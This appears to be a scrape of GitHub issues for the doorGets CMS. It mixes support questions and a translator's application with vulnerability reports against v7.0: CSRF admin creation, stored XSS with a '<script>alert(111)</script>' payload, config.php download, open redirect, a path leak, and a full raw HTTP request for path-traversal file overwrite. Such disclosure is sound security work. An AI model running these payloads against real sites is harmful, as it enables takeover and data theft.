Hi,

site works fine but I get 500 error when saving the article, entering dashboard, opening modules. and i noticed when uploading picture wont save. Chmod changed from 755 to 777 all files and direcries.

Error gets on webserver vps, but on localhost works perfect. its same configuration without htaacces file.

Although there are token fields, this field does not prevent CSRF attacks.
poc：

When the victim accesses the malicious constructed link.

Successfully added an administrator user and tried to log in.

A xss vulnerability was discovered in doorGets v7.0.
There is a stored XSS vulnerability in ARTICLE if I use the payload </textarea><script>alert(111)</script>.

First, you need to add article.

http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&action=add

Then add payload(</textarea><script>alert(111)</script>) to article content.

Save the article and click the generated link.

Change the content of an article.

When you click the article content, it will trigger the payload.

View page source, you will find the XSS payload.

Hi there,

Good day and how are you? I hope this message finds you well.

I am Joseph Buarao , who has been doing high quality Filipino and Tagalog translations for several projects.

Consider this message as my letter of application. I am a web developer by profession and an experienced Filipino translator - these are on top of being an experienced web developer with more than 6 years of experience and specialized in the following scripting languages and technologies (HTML, CSS, JS, JQUERY, PHP, WORDPRESS and CONCRETE5). This means I know which codes are to be translated, and which ones that are to remain as it is. I am a strong advocate of thought-by-thought instead of word-by-word style of doing the translations, and I am carefully strict in grammars and spellings and proper word conjugations of my languages, Filipino and Tagalog.

I hope to hear from you soon and work with you in the translations. You can count on me that I will do my job with utmost dedication. Thank you and more power to you.

You can check my previous contributions:

textpattern/textpattern@29308ff
https://crowdin.com/project/textpattern-cms-textpacks/fil

Best Regards,
Joseph Buarao

Hello Developers,

I would like to upgrade my Doorgets installation to 7.0. How can I do it best? Is that also the Doorgtes backend or do I have to do it manually.

Once a glitch is me this happened and I have to reinstall everything. The contents were naturally away.

Thank you in advance.

Although there are file directory restriction,but obviously it can be bypassed.

poc:
we can visit this url and download any file.for example,we can get config.php

So,the configuration information we got:

Because the parameters are not filtered, a URL jump vulnerability is created, which may cause users to be attacked by phishing.

Demonstrate the attack process

We can clearly see that it jumped to the phishing website http://127.0.0.1

⚠️ Potential Vulnerability in CMS

👋 Hello, @mounirrquiba - @Kamal-418 has disclosed a potential vulnerability in your repository. To validate or invalidate this potential vulnerability, please visit https://huntr.dev/bounties/1-other-doorgets/CMS and join our community in helping secure open-source code.

☎️ Need further support?

Come and join us on our Discord and a member of our team will be happy to help! 🤗

cc - @JamieSlome

A leaked absolute path vulnerability was discovered in doorGets v7.0.
There is a leaked absolute path vulnerability in ARTICLE if I upload file.
http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&lg=cn

First, add the article.
http://192.168.187.130/doorgets/dg-user/cn/?controller=moduleblog&uri=blog&action=add

Then, upload file.

File upload success and returned data packets

Modify the content-type value to text/html, you will find the absolute path in the packet.

Hello developers!

I deal with just Doorgets and would like to have in their own blog Disqus comments. Unfortunately I do not know where or template where you have to enter the Disqus-Short name.

Can you help me maybe?

Thank you in advance.

Create a file under the c drive,Content is test

poc：

Modify the contents of the file in 1.txt by poc

`POST /doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=../../../../../../../../../../../../../1.txt%00 HTTP/1.1
Host: 192.168.235.239
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.235.239/doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=doorgets/css/1.txt
Content-Type: multipart/form-data; boundary=---------------------------213043527767318740686762945
Content-Length: 456
Connection: close
Cookie: PHPSESSID=hnqke81g3nt2l9jjb9v2mn9va4
Upgrade-Insecure-Requests: 1

-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="theme_content_nofi"

this is payload
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_bootstrap_version"

paper
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_submit"

Save
-----------------------------213043527767318740686762945--
`

Of course, you can also modify the contents of any file to make the web unusable.

Hello

The .htaccess file gives me a 500 error.
ModRewrite is usually ok with other PHP scripts.

Seems to me that there are a lots of "space" in the URL/regexp...

Renamed to another name and site is ok though...

In which licence did you publish your code ?